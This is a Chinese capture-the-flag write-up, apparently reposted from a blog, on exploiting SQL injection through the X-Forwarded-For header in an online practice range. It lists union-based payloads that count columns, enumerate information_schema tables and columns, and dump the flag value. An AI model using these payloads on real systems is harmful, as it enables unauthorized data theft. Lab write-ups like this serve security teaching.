墨者学院-在线靶场-HTTP头注入漏洞测试(X-Forwarded-for) Writeup

首先题目提示

XFF注入,大致思路为Burp抓包添加XFF请求头进行注入。
启动靶场
点击进入墨者的任性网页

Burpsuite抓包,放进Repeater

先GO一下
在这里插入图片描述
在请求头中添加X-Forwarded-For
试了试 'and 1=1and 1=2都没反应
当改为or 1=1时,提示语法错误
在这里插入图片描述
在这里插入图片描述
继续,union注入步骤

order by 5显示未知字段,order by 4返回正常

得到数据库中的字段数

在这里插入图片描述
在这里插入图片描述

union select 1,2,3,4

看看有哪些回显点,发现多了一行商品,名称,价格,数量分别为2,3,4
在这里插入图片描述
在这里插入图片描述
爆数据库版本和数据库名

union select 1,2,version(),database()

在这里插入图片描述
在这里插入图片描述

union select 1,2,(select table_name from information_schema.tables where table_schema = 'pentesterlab' limit 0,1),database()

第一个表名为comment

union select 1,2,(select table_name from information_schema.tables where table_schema = 'pentesterlab' limit 1,1),database()

在这里插入图片描述
在这里插入图片描述
第二个表名为flag,应该是这个表了。

继续

union select 1,2,(select column_name from information_schema.columns where table_name = 'flag' limit 0,1),database()

第一个字段名为id,再试试第二个

union select 1,2,(select column_name from information_schema.columns where table_name = 'flag' limit 1,1),database()

在这里插入图片描述
flag应该就在这个字段中

union select 1,2,(select flag from pentesterlab.flag limit 0,1),database()

得到flag
在这里插入图片描述
回到最初页面,验证flag,得到key。
在这里插入图片描述
在这里插入图片描述

发布了27 篇原创文章 · 获赞 2 · 访问量 3919

猜你喜欢

转载自blog.csdn.net/s0mor/article/details/98964748